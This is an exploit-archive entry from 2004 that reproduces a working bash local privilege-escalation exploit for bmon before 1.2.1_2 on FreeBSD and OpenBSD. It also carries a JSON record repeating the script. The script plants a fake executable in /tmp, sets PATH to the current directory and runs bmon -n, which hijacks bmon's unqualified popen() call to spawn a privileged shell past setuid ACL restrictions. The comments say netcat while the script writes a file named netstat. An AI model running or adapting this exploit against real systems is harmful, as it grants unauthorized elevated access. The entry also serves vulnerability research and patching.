Search...

BSD bmon 1.2.1_2 - Local acls Bypass

2004-10-16T00:00:00

ID EXPLOITPACK:07A52EFCC26DE24FD919EA8CEC9E9169
Type exploitpack
Reporter Idan Nahoum
Modified 2004-10-16T00:00:00

Description

BSD bmon 1.2.1_2 - Local acls Bypass

                                        
                                            #!/usr/local/bin/bash

# Written by Idan Nahoum. idanna@bk.ru
# local exploit for FreeBSD/OpenBSD with bmon &lt; 1.2.1_2 installed.
# when bmon is executed with the -n parameter it popen()s netcat
# but fail to provide an absoluth path.
# some bsds are configured with acls that doesnt allow setuid files to 
# run except those that are explicity allowed, so creating a file called 
# netcat that chmod's +s bash wouldnt work, bash needs to run directly by
# bmon which uses ncurses, so to get a useable shell we need to redirect
# stdout to stderr (stdout is closed), and restore the stty settings.
# http://www.vuxml.org/freebsd/938f357c-16dd-11d9-bc4a-000c41e2cdad.html

declare -r SPATH="${PATH}"
declare -r STTY_EXEC=$(which stty)
declare -r STTY_SETTINGS=$(${STTY_EXEC} -g) 
declare -r QSHELL="/usr/local/bin/bash"
declare BMON_EXEC="/usr/local/sbin/bmon"

echo "$0 &lt;path to bmon&gt; [default: ${BMON_EXEC}]"

[ "$#" -gt "0" ] && BMON_EXEC="${1}"

[ -x "${BMON_EXEC}" ] || 
{
echo "${BMON_EXEC} not found"
exit
}

cd /tmp

# apparently bmon closes stdout, so we run a shell with stdout redirected 
# to stderr.

cat &gt; ./netstat &lt;&lt;EOF
${STTY_EXEC} ${STTY_SETTINGS}
PATH=${SPATH} /bin/sh 1&gt;&2
EOF

/bin/chmod 755 ./netstat
echo "trying to exploit"
PATH=./ "${BMON_EXEC}" -n 

# milw0rm.com [2004-10-16]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:05", "references": [], "description": "\nBSD bmon 1.2.1_2 - Local acls Bypass", "edition": 1, "reporter": "Idan Nahoum", "exploitpack": {"type": "local", "platform": "bsd"}, "published": "2004-10-16T00:00:00", "title": "BSD bmon 1.2.1_2 - Local acls Bypass", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2004-10-16T00:00:00", "id": "EXPLOITPACK:07A52EFCC26DE24FD919EA8CEC9E9169", "href": "", "viewCount": 2, "sourceData": "#!/usr/local/bin/bash\n\n# Written by Idan Nahoum. idanna@bk.ru\n# local exploit for FreeBSD/OpenBSD with bmon < 1.2.1_2 installed.\n# when bmon is executed with the -n parameter it popen()s netcat\n# but fail to provide an absoluth path.\n# some bsds are configured with acls that doesnt allow setuid files to \n# run except those that are explicity allowed, so creating a file called \n# netcat that chmod's +s bash wouldnt work, bash needs to run directly by\n# bmon which uses ncurses, so to get a useable shell we need to redirect\n# stdout to stderr (stdout is closed), and restore the stty settings.\n# http://www.vuxml.org/freebsd/938f357c-16dd-11d9-bc4a-000c41e2cdad.html\n\ndeclare -r SPATH=\"${PATH}\"\ndeclare -r STTY_EXEC=$(which stty)\ndeclare -r STTY_SETTINGS=$(${STTY_EXEC} -g) \ndeclare -r QSHELL=\"/usr/local/bin/bash\"\ndeclare BMON_EXEC=\"/usr/local/sbin/bmon\"\n\necho \"$0 <path to bmon> [default: ${BMON_EXEC}]\"\n\n[ \"$#\" -gt \"0\" ] && BMON_EXEC=\"${1}\"\n\n[ -x \"${BMON_EXEC}\" ] || \n{\necho \"${BMON_EXEC} not found\"\nexit\n}\n\ncd /tmp\n\n# apparently bmon closes stdout, so we run a shell with stdout redirected \n# to stderr.\n\ncat > ./netstat <<EOF\n${STTY_EXEC} ${STTY_SETTINGS}\nPATH=${SPATH} /bin/sh 1>&2\nEOF\n\n/bin/chmod 755 ./netstat\necho \"trying to exploit\"\nPATH=./ \"${BMON_EXEC}\" -n \n\n# milw0rm.com [2004-10-16]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645829258}}